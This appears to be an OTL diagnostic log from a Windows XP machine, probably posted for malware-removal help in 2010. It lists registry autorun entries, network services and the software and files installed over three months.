O20 - Winlogon\Notify\LBTWlgn: DllName - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll - c:\Program Files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll (Logitech, Inc.)
O22 - SharedTaskScheduler: {1984DD45-52CF-49cd-AB77-18F378FEA264} - FencesShellExt - C:\Program Files\Stardock\Fences\FencesMenu.dll (Stardock)
O24 - Desktop WallPaper: C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O24 - Desktop BackupWallPaper: C:\Documents and Settings\Me\Local Settings\Application Data\Microsoft\Wallpaper1.bmp
O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2010/02/12 22:03:36 | 000,000,000 | ---- | M] () - C:\AUTOEXEC.BAT -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk /r \??\L:) -  File not found
O34 - HKLM BootExecute: (autocheck autochk *) -  File not found
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*

NetSvcs: 6to4 -  File not found
NetSvcs: Ias - C:\WINDOWS\system32\ias [2010/02/12 16:38:57 | 000,000,000 | ---D | M]
NetSvcs: Iprip -  File not found
NetSvcs: Irmon -  File not found
NetSvcs: NWCWorkstation -  File not found
NetSvcs: Nwsapagent -  File not found
NetSvcs: WmdmPmSp -  File not found

CREATERESTOREPOINT
Restore point Set: OTL Restore Point (0)

[color=#E56717]========== Files/Folders - Created Within 90 Days ==========[/color]

[2010/05/13 20:31:28 | 000,570,880 | ---- | C] (OldTimer Tools) -- C:\Documents and Settings\Me\Desktop\OTL.exe
[2010/05/12 12:40:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\PrimoPDF
[2010/05/12 12:39:58 | 000,000,000 | ---D | C] -- C:\Program Files\Nitro PDF
[2010/05/12 10:47:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\HumbleIndieBundleGames
[2010/05/11 19:16:34 | 000,000,000 | -HSD | C] -- C:\RECYCLER
[2010/05/11 19:11:24 | 000,000,000 | ---D | C] -- C:\Program Files\Emsisoft Anti-Malware
[2010/05/11 19:11:24 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Anti-Malware
[2010/05/11 18:36:57 | 000,000,000 | RHSD | C] -- C:\cmdcons
[2010/05/11 18:35:18 | 000,212,480 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWXCACLS.exe
[2010/05/11 18:35:18 | 000,161,792 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWREG.exe
[2010/05/11 18:35:18 | 000,136,704 | ---- | C] (SteelWerX) -- C:\WINDOWS\SWSC.exe
[2010/05/11 18:35:18 | 000,031,232 | ---- | C] (NirSoft) -- C:\WINDOWS\NIRCMD.exe
[2010/05/11 18:34:54 | 000,000,000 | ---D | C] -- C:\WINDOWS\ERDNT
[2010/05/11 17:04:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\LogMeIn Hamachi
[2010/05/11 17:04:19 | 000,000,000 | ---D | C] -- C:\Documents and Settings\LocalService\Local Settings\Application Data\LogMeIn Hamachi
[2010/05/11 17:04:00 | 000,000,000 | ---D | C] -- C:\Program Files\LogMeIn Hamachi
[2010/05/11 15:03:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\drivers
[2010/05/11 14:54:31 | 000,023,456 | ---- | C] (Phoenix Technologies) -- C:\WINDOWS\System32\drivers\DrvAgent32.sys
[2010/05/11 14:54:31 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\eSupport.com
[2010/05/10 07:05:06 | 000,000,000 | ---D | C] -- C:\Program Files\Partition Wizard Home Edition 5.0
[2010/05/09 17:15:04 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My Received Files
[2010/05/08 19:10:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Wii-downloads
[2010/05/08 18:29:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Dragon-PDFs
[2010/05/08 18:06:02 | 000,000,000 | ---D | C] -- C:\Program Files\Marvell
[2010/05/06 20:43:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Stardock
[2010/05/06 20:43:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Stardock
[2010/05/06 20:37:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Stardock
[2010/05/06 20:37:06 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{A87EB928-0C6C-4071-AEF1-59E32BAEDF1B}
[2010/05/06 20:36:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\PackageAware
[2010/05/06 20:36:27 | 000,000,000 | ---D | C] -- C:\Program Files\Stardock
[2010/05/06 20:36:27 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Stardock
[2010/05/06 20:36:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\DonationCoder
[2010/05/06 20:35:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\DonationCoder
[2010/05/06 20:35:53 | 000,000,000 | ---D | C] -- C:\Program Files\FindAndRunRobot
[2010/05/01 22:26:42 | 000,000,000 | RH-D | C] -- C:\Documents and Settings\Me\Recent
[2010/04/28 18:32:41 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Sparkplay Media
[2010/04/26 19:34:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\NtmsData
[2010/04/25 22:36:28 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Games for Windows - LIVE
[2010/04/25 22:19:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Flight Simulator X Files
[2010/04/25 21:30:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\InstallShield Installation Information
[2010/04/25 21:30:27 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Fallout3
[2010/04/25 21:28:29 | 000,000,000 | ---D | C] -- C:\WINDOWS\System32\xlive
[2010/04/25 14:38:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My eBooks
[2010/04/25 14:38:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Mobipocket
[2010/04/25 14:38:34 | 000,000,000 | ---D | C] -- C:\Program Files\Mobipocket.com
[2010/04/25 11:50:13 | 000,230,824 | R--- | C] (Coupons, Inc.) -- C:\WINDOWS\System32\cpnprt2.cid
[2010/04/25 11:50:08 | 000,000,000 | ---D | C] -- C:\Program Files\Coupons
[2010/04/25 11:50:08 | 000,000,000 | ---D | C] -- C:\WINDOWS\Cache
[2010/04/24 17:11:40 | 000,000,000 | ---D | C] -- C:\Perl
[2010/04/24 14:24:38 | 000,000,000 | ---D | C] -- C:\Program Files\Belarc
[2010/04/24 14:13:36 | 000,000,000 | ---D | C] -- C:\Program Files\PhotoScape
[2010/04/21 22:00:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\breakin
[2010/04/21 21:45:03 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\TEMP
[2010/04/21 21:44:54 | 000,000,000 | ---D | C] -- C:\Program Files\Syslogd
[2010/04/21 21:16:04 | 000,000,000 | ---D | C] -- C:\Program Files\WinPcap
[2010/04/21 21:03:19 | 000,000,000 | ---D | C] -- C:\Snort
[2010/04/20 20:18:40 | 000,413,696 | ---- | C] (Creative Labs) -- C:\WINDOWS\System32\wrap_oal.dll
[2010/04/20 20:18:40 | 000,110,592 | ---- | C] (Portions (C) Creative Labs Inc. and NVIDIA Corp.) -- C:\WINDOWS\System32\OpenAL32.dll
[2010/04/20 20:18:40 | 000,000,000 | ---D | C] -- C:\Program Files\OpenAL
[2010/04/20 20:18:31 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\flightgear.org
[2010/04/19 22:27:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\YSFLIGHT.COM
[2010/04/19 22:27:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\YSFLIGHT.COM
[2010/04/18 20:35:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Sophies_Photos
[2010/04/17 21:40:50 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\a-squared
[2010/04/17 21:37:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\GetRightToGo
[2010/04/16 08:02:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\TeamViewer
[2010/04/16 08:02:02 | 000,000,000 | ---D | C] -- C:\Program Files\TeamViewer
[2010/04/15 22:24:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\IObit
[2010/04/12 00:37:21 | 000,045,056 | ---- | C] (Adaptec) -- C:\WINDOWS\System32\wnaspi32.dll
[2010/04/12 00:20:12 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Pinnacle
[2010/04/12 00:20:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Downloaded Installations
[2010/04/12 00:19:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Pinnacle
[2010/04/12 00:19:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Pinnacle Studio Ultimate
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\PACE Anti-Piracy
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\PACE Anti-Piracy
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\PACE Anti-Piracy
[2010/04/12 00:19:32 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\PACE Anti-Piracy
[2010/04/12 00:18:45 | 000,017,408 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\drivers\dgfwboot.sys
[2010/04/12 00:18:45 | 000,011,776 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\drivers\diginet.sys
[2010/04/12 00:18:43 | 003,638,655 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\DirectIO.dll
[2010/04/12 00:18:43 | 000,483,328 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\Dsi.dll
[2010/04/12 00:18:43 | 000,118,784 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\Diomidi.DLL
[2010/04/12 00:18:43 | 000,015,872 | ---- | C] (Digidesign, A Division of Avid Technology, Inc.) -- C:\WINDOWS\System32\digicoin.dll
[2010/04/12 00:18:42 | 000,000,000 | ---D | C] -- C:\Program Files\Digidesign
[2010/04/12 00:14:27 | 000,000,000 | ---D | C] -- C:\Program Files\Avid
[2010/04/12 00:13:50 | 000,000,000 | ---D | C] -- C:\Program Files\SafeNet Sentinel
[2010/04/12 00:13:50 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\SafeNet Sentinel
[2010/04/12 00:13:49 | 000,000,000 | ---D | C] -- C:\WINDOWS\Downloaded Installations
[2010/04/11 22:34:15 | 000,000,000 | ---D | C] -- C:\Config.Msi
[2010/04/11 22:33:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Pinnacle
[2010/04/11 22:23:54 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Studio14Trial
[2010/04/11 21:17:22 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\AVS4YOU
[2010/04/11 21:17:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\AVS4YOU
[2010/04/11 21:16:37 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\AVSMedia
[2010/04/11 21:16:34 | 000,000,000 | ---D | C] -- C:\Program Files\AVS4YOU
[2010/04/11 21:07:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Pinnacle Studio
[2010/04/11 21:05:07 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\Shared Avid Projects
[2010/04/11 21:04:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Avid
[2010/04/11 21:04:13 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Avid
[2010/04/11 20:51:11 | 000,000,000 | ---D | C] -- C:\Program Files\InterLok
[2010/04/11 12:56:01 | 000,000,000 | ---D | C] -- C:\Program Files\Pure Motion
[2010/04/11 12:56:00 | 000,000,000 | ---D | C] -- C:\Program Files\Sonic Foundry
[2010/04/11 12:56:00 | 000,000,000 | ---D | C] -- C:\Program Files\Adobe
[2010/04/11 12:55:54 | 000,000,000 | ---D | C] -- C:\Program Files\DebugMode
[2010/04/10 21:18:58 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Temp
[2010/04/10 21:18:56 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Google
[2010/04/08 17:54:07 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\MAGIX
[2010/04/08 17:52:48 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\MAGIX_Speed2_burnR_mxcdr
[2010/04/08 17:52:40 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\MAGIX Shared
[2010/04/08 17:52:39 | 000,917,504 | ---- | C] (MAGIX AG) -- C:\WINDOWS\System32\MXRestore.exe
[2010/04/08 17:52:39 | 000,724,992 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLAV32.dll
[2010/04/08 17:52:39 | 000,278,528 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLRES32.dll
[2010/04/08 17:52:39 | 000,221,184 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLDRV32.dll
[2010/04/08 17:52:39 | 000,212,992 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLDEV32.dll
[2010/04/08 17:52:39 | 000,147,456 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLCPY32.dll
[2010/04/08 17:52:39 | 000,114,688 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLCDA32.dll
[2010/04/08 17:52:39 | 000,094,208 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLIO32.dll
[2010/04/08 17:52:39 | 000,090,112 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPRF32.dll
[2010/04/08 17:52:39 | 000,077,824 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPNT32.dll
[2010/04/08 17:52:39 | 000,065,536 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\STRING32.dll
[2010/04/08 17:52:39 | 000,065,536 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPTL32.dll
[2010/04/08 17:52:39 | 000,061,440 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLCDF32.dll
[2010/04/08 17:52:39 | 000,057,344 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLTPO32.dll
[2010/04/08 17:52:39 | 000,053,248 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLPRJ32.dll
[2010/04/08 17:52:39 | 000,045,056 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLIMG32.dll
[2010/04/08 17:52:39 | 000,040,960 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLRD32.dll
[2010/04/08 17:52:39 | 000,032,768 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLMSC32.dll
[2010/04/08 17:52:39 | 000,032,768 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLISO32.dll
[2010/04/08 17:52:39 | 000,032,768 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLDIR32.dll
[2010/04/08 17:52:39 | 000,024,576 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\TTIC32.dll
[2010/04/08 17:52:39 | 000,024,576 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\TTI32.dll
[2010/04/08 17:52:39 | 000,024,576 | ---- | C] (PoINT Software & Systems GmbH) -- C:\WINDOWS\System32\DLLIX.dll
[2010/04/08 17:52:15 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Documents\MAGIX_Movie_Edit_Pro_15_silver
[2010/04/08 17:52:02 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\MAGIX
[2010/04/08 17:51:49 | 000,000,000 | ---D | C] -- C:\Program Files\MAGIX
[2010/04/08 17:51:18 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\MAGIX Services
[2010/04/07 20:38:38 | 000,000,000 | ---D | C] -- C:\Program Files\IObit
[2010/04/07 20:38:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\IObit
[2010/04/07 19:48:43 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Silverlight
[2010/04/05 18:14:55 | 000,000,000 | ---D | C] -- C:\WINDOWS\.jagex_cache_32
[2010/04/03 09:18:36 | 000,000,000 | ---D | C] -- C:\Program Files\DAEMON Tools Lite
[2010/04/01 09:34:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Foxit Software
[2010/03/29 19:56:57 | 000,000,000 | ---D | C] -- C:\Program Files\Notepad++
[2010/03/29 19:56:57 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Notepad++
[2010/03/27 17:22:13 | 000,000,000 | ---D | C] -- C:\Program Files\Padus
[2010/03/26 21:43:53 | 000,061,440 | ---- | C] (Khronos Group) -- C:\WINDOWS\System32\OpenCL.dll
[2010/03/25 21:15:44 | 000,000,000 | ---D | C] -- C:\Program Files\Paint.NET
[2010/03/25 21:15:44 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Paint.NET
[2010/03/19 19:32:02 | 000,019,024 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2010/03/19 19:32:01 | 000,164,048 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2010/03/19 19:32:01 | 000,023,376 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2010/03/19 19:32:00 | 000,100,432 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2010/03/19 19:32:00 | 000,094,800 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2010/03/19 19:32:00 | 000,046,672 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2010/03/19 19:31:59 | 000,028,880 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2010/03/19 19:31:46 | 000,165,032 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2010/03/19 19:31:46 | 000,038,848 | ---- | C] (ALWIL Software) -- C:\WINDOWS\System32\avastSS.scr
[2010/03/15 19:55:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Sansa Media Converter
[2010/03/15 19:55:03 | 000,014,608 | ---- | C] (InterVideo, Inc.) -- C:\WINDOWS\System32\iviaspi.sys
[2010/03/15 19:54:58 | 000,000,000 | ---D | C] -- C:\Program Files\SanDisk
[2010/03/15 19:44:59 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\SanDisk
[2010/03/14 10:52:30 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\dwhelper
[2010/03/13 21:35:36 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Pier-Luc_Duchaine
[2010/03/13 21:29:35 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\WinRAR
[2010/03/13 16:33:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\ATI
[2010/03/13 16:33:40 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\ATI
[2010/03/13 16:11:29 | 000,208,896 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\atipdlxx.dll
[2010/03/13 16:11:29 | 000,155,648 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\Oemdspif.dll
[2010/03/13 16:11:29 | 000,026,112 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\Ati2mdxx.exe
[2010/03/13 16:11:29 | 000,024,064 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\ativcoxx.dll
[2010/03/13 16:11:28 | 000,043,520 | ---- | C] (ATI Technologies, Inc.) -- C:\WINDOWS\System32\ati2edxx.dll
[2010/03/10 13:16:06 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Sun
[2010/03/10 13:16:05 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Java
[2010/03/10 12:41:31 | 000,000,000 | ---D | C] -- C:\Program Files\Java
[2010/03/10 12:40:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Sun
[2010/03/10 11:26:33 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2010/03/10 10:10:03 | 000,000,000 | ---D | C] -- C:\Program Files\Windows Installer Clean Up
[2010/03/10 10:09:55 | 000,000,000 | ---D | C] -- C:\Program Files\MSECACHE
[2010/03/10 00:35:44 | 000,000,000 | ---D | C] -- C:\Program Files\D-Box
[2010/03/09 20:42:32 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Nikon
[2010/03/09 20:41:26 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Digital Image 2006
[2010/03/08 22:34:19 | 000,000,000 | ---D | C] -- C:\Program Files\kidthing
[2010/03/07 21:18:38 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\JodysStuff
[2010/03/06 19:39:11 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Foxit
[2010/03/06 19:39:03 | 000,000,000 | ---D | C] -- C:\Program Files\Foxit Software
[2010/03/03 23:21:34 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\HandBrake
[2010/03/03 23:21:20 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\HandBrake
[2010/03/03 23:21:12 | 000,000,000 | ---D | C] -- C:\Program Files\Handbrake
[2010/03/02 20:27:16 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Desktop\Pictures from Memory Cards
[2010/03/02 18:36:47 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\My Games
[2010/02/28 17:54:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Apple Computer
[2010/02/28 15:47:59 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Unity
[2010/02/28 14:40:01 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Unity
[2010/02/27 16:34:48 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Synchronization Services
[2010/02/27 16:34:40 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\DESIGNER
[2010/02/27 16:34:12 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft.NET
[2010/02/27 16:34:12 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Microsoft
[2010/02/27 16:33:22 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Visual Studio 8
[2010/02/27 16:32:17 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Analysis Services
[2010/02/27 16:32:07 | 000,000,000 | ---D | C] -- C:\WINDOWS\SHELLNEW
[2010/02/27 16:31:17 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Office
[2010/02/26 17:20:25 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Download Manager
[2010/02/26 16:29:29 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Virtualized Applications
[2010/02/25 23:57:09 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\GrabIt
[2010/02/24 22:52:36 | 000,000,000 | ---D | C] -- C:\Program Files\ICW
[2010/02/23 00:50:35 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{D69A48BF-7653-4AA8-94BC-5847522A4573}
[2010/02/23 00:49:57 | 000,000,000 | ---D | C] -- C:\Program Files\Vstplugins
[2010/02/23 00:49:57 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Digidesign
[2010/02/23 00:49:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Native Instruments
[2010/02/23 00:49:48 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{0CC51CB2-911C-40BB-BC1B-BD3CAC590222}
[2010/02/23 00:49:31 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{4F32CAF7-963B-404D-BF13-C48BA3F5F6A7}
[2010/02/23 00:49:17 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{AC46DC4F-66BD-4733-A8B4-0B69418C12D0}
[2010/02/23 00:48:52 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{EC98E512-708C-4C3B-9F07-B58768C1DD8A}
[2010/02/23 00:36:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\TruePianos Settings
[2010/02/23 00:36:23 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Native Instruments
[2010/02/23 00:36:10 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\Cakewalk
[2010/02/23 00:33:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\My Documents\Cakewalk
[2010/02/23 00:33:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Cakewalk
[2010/02/23 00:31:04 | 000,000,000 | -H-D | C] -- C:\Documents and Settings\All Users\Application Data\{902029B2-957E-4066-85FA-30DA31731718}
[2010/02/23 00:31:00 | 000,000,000 | ---D | C] -- C:\Program Files\Native Instruments
[2010/02/23 00:31:00 | 000,000,000 | ---D | C] -- C:\Program Files\Common Files\Native Instruments
[2010/02/23 00:29:55 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Identities
[2010/02/23 00:24:58 | 000,368,640 | ---- | C] (Propellerhead Software AB) -- C:\WINDOWS\System32\ReWire.dll
[2010/02/23 00:24:41 | 000,000,000 | ---D | C] -- C:\Cakewalk Projects
[2010/02/23 00:24:18 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Cakewalk
[2010/02/23 00:21:31 | 000,000,000 | ---D | C] -- C:\Program Files\Cakewalk
[2010/02/23 00:07:59 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Apple Computer
[2010/02/23 00:07:55 | 000,000,000 | ---D | C] -- C:\Program Files\QT Lite
[2010/02/22 23:57:30 | 000,000,000 | ---D | C] -- C:\WINDOWS\RegisteredPackages
[2010/02/22 20:03:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Windows Search
[2010/02/21 23:27:05 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\gtk-2.0
[2010/02/21 21:34:08 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\vlc
[2010/02/21 21:33:29 | 000,000,000 | ---D | C] -- C:\Program Files\VideoLAN
[2010/02/21 20:22:21 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Local Settings\Application Data\QuickPar
[2010/02/21 20:21:42 | 000,000,000 | ---D | C] -- C:\Program Files\QuickPar
[2010/02/21 19:48:33 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Logitech
[2010/02/21 19:38:07 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Me\Application Data\Leadertech
[2010/02/21 19:38:00 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\LogiShrd
[2010/02/21 19:37:41 | 000,010,384 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\drivers\LBeepKE.sys
[2010/02/21 19:35:50 | 000,170,512 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\kemutb.dll
[2010/02/21 19:35:50 | 000,145,936 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\KemUtil.dll
[2010/02/21 19:35:50 | 000,117,264 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\KemWnd.dll
[2010/02/21 19:35:50 | 000,084,496 | ---- | C] (Logitech, Inc.) -- C:\WINDOWS\System32\KemXML.dll
